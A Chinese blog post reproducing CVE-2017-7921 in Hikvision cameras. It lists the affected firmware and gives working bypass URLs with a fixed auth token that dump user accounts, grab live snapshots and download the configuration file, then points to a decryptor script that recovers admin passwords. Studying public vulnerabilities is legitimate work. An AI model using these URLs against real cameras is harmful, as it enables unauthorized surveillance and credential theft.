海康威视(Hikvision)多款摄像头_未授权访问[CVE-2017-7921]

已于 2023-11-17 11:08:30 修改
阅读量1.8k 收藏 5
点赞数 9
分类专栏: 漏洞复现 文章标签: 网络安全 python
于 2023-11-17 11:03:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/destiny_hhn/article/details/134456640
版权

海康威视(Hikvision)多款摄像头_未授权访问[CVE-2017-7921]

概要

关于海康威视多款摄像头_未授权访问[CVE-2017-7921]漏洞简单复现。
本文章仅供学习参考,无任何引导从事违法违规行为,个人行为与本文章以及作者无关!

漏洞描述

1.海康威视摄像头管理界面存在未授权访问漏洞,通过构造URL可以获取账户信息、配置文件、浏览摄像画面,通过脚本对配置文件进行解密,从而获取到管理用户名、密码。
1.2影响版本
DS-2CD2xx2F-I 系列 V5.2.0 build 140721 至 V5.4.0 build 160530
DS-2CD2xx0F-I 系列 V5.2.0 build 140721 至 V5.4.0 Build 160401
DS-2CD2xx2FWD 系列 V5.3.1 build 150410 至 V5.4.4 Build 161125
DS-2CD4x2xFWD 系列 V5.2.0 Build 140721 至 V5.4.0 Build 160414
DS-2CD4xx5 系列 V5.2.0 Build 140721 至 V5.4.0 Build 160421
DS-2DFx 系列 V5.2.0 Build 140805 至 V5.4.5 Build 160928
DS-2CD63xx 系列 V5.0.9 构建140305至 V5.3.5 构建160106设备
在这里插入图片描述
1.3获取账户信息
构造URL-----http://ip/Security/users?auth=YWRtaW46MTEK
在这里插入图片描述
1.4未授权访问当前监控信息
构造URL-----http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK
1.5获取下载配置文件(configurationFile)
构造URL-----http://ip/System/configurationFile?auth=YWRtaW46MTEK
在这里插入图片描述

脚本使用

通过脚本对configurationFile进行解密获得登录用户名、密码
2.1脚本下载链接
https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decrypto
在这里插入图片描述

2.2 电脑环境
2.2.1 python
2.2.2 依赖crypto
pip install crypto
2.3 使用方式
decrypt_configurationFile.py
在这里插入图片描述

遇到的问题

3.1 from Crypto.Cipher import AES ModuleNotFoundError: No module named ‘Crypto’
在这里插入图片描述
解决:
将C盘的C:\Users\H\AppData\Local\Programs\Python\Python310\Lib\site-packages
crypto文件夹重命名为Crypto
注:1.此路径为本作者电脑路径,路径不一定一样。
2.思路相同:修改文件夹名字

碌碌无为,改变现状
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 4005
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
【漏洞复现】Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 1691
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 9089
这是一个海康威视摄像头后台管理授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
探索安全新边界:Hikvision综合漏洞利用工具
最新发布
gitblog_00058的博客
06-20 600
探索安全新边界:Hikvision综合漏洞利用工具 项目地址:https://gitcode.com/MInggongK/Hikvision- 1、项目介绍 在网络安全领域,提前发现并修复漏洞至关重要。为此,我们荣幸地向您推介一款由C#语言编写的开源项目——Hikvision综合漏洞利用工具。这款工具专门针对海康威视的产品,旨在帮助安全研究人员和管理员检测与利用一系列已知的安全漏洞,确保网络环境的...
海康威视CVE-2017-7921
qq_46527139的博客
12-22 1万+
海康威视CVE-2017-7921
【漏洞复现】海康威视运行管理中心 center/api/session 存在远程命令执行漏洞
https://blog.echo234.cn/
03-28 1625
通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 StandardLoginAction_getAllUser存在信息泄露漏洞
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 5774
许多HikvisionIP摄像机包含一个后门,允许经身份验证的模拟任何配置的用户帐户。
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
02-10
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
【漏洞复现】Hikvision流媒体管理服务器信息泄露漏洞
晚风不及你
01-25 747
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视 CVE-2017-7921 授权
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-12 220
成功利用这些漏洞可能会导致恶意攻击者提升其权限或假设已验证用户的身份并获取敏感数据。
授权漏洞
qq_39541626的博客
03-16 1483
https://www.cnblogs.com/KevinGeorge/p/8921133.html 访问控制类漏洞与隐患 这一类漏洞与隐患属于访问控制与身份鉴别问题,一般有没有配置访问控制、访问控制弱(弱口令或者空口令),身份鉴别可以绕过等问题 漏洞协议组件 漏洞类型 漏洞评级 SSH 弱口令 严重 RDP 授权、弱口令 严重 SMB 授权(共享直接访问,不验证)、弱口令 严...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。 具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
configurationFile配置文件解密
RC4加/解密软件-Decrypt_1.0.2.zip
07-31
安卓版的字符串加密软件,利用RC4加密实现的字符串加密功能,加/解密皆可使用内附教程视频,需要的朋友可以下载
【漏洞复现】GB28181摄像头管理平台user授权漏洞
晚风不及你
04-27 508
GB28181-pro开源物联网摄像头管理平台api/user存在授权访问漏洞,攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。
【复现】cellinx摄像设备 授权漏洞_50
fushuang333的博客
02-16 535
【复现】cellinx摄像设备 授权漏洞,通过授权访问可以创建用户进入后台,可能造成系统功能破坏。
Onvif登录海康、大华摄像机(IPC)提示权鉴失败的问题解决
热门推荐
QuickGBLink的博客
12-08 1万+
最近用我们的Onvif设备发现客户端测试,发现连接某些摄像机Onvif获取不到设备信息,提示401权鉴失败。确认用户名和密码都没错的情况下,都还是失败,软件提示信息截图如下: 我们测的摄像机有海康和大华的,都出现了这种问题。后来折腾了一下,找到一个临时的解决办法,下面对每种摄像机的问题现象和解决办法都介绍一下。 1. 海康摄像机 看程序打印的Onvif请求回复信息,打印出错信息如...
海康摄像头CVE-2021-36260漏洞复现
Karka_的博客
06-06 1176
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
ds-2cd234xyzuv3-abcdef 海康威视(hikvision) 摄像头漏洞复现
12-21
ds-2cd234xyzuv3-abcdef是海康威视(hikvision)公司的摄像头型号,最近被发现存在安全漏洞。该漏洞可能会导致黑客远程攻击和入侵摄像头系统,进而窃取用户的隐私信息或者对系统进行破坏。这对用户和公共安全都构成了潜在威胁。 针对该摄像头漏洞的复现工作已经展开,安全研究人员正在尝试利用该漏洞对摄像头系统进行攻击,并重现漏洞的具体影响和危害。通过复现漏洞,可以更清晰地了解漏洞的工作原理和影响范围,有助于推动厂商尽快修复漏洞并发布安全补丁。 除了复现漏洞外,安全研究人员还会在漏洞披露后向厂商报告漏洞细节,为修复漏洞提供技术支持。同时,用户也需要进行及时的摄像头固件更新和安全设置,以防止遭受潜在攻击。 总之,对ds-2cd234xyzuv3-abcdef摄像头的漏洞复现工作是非常重要的,它有助于加强对漏洞的理解和防范措施,保障用户和公共安全。希望厂商和安全社区能够共同努力,尽快解决该漏洞带来的安全隐患。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值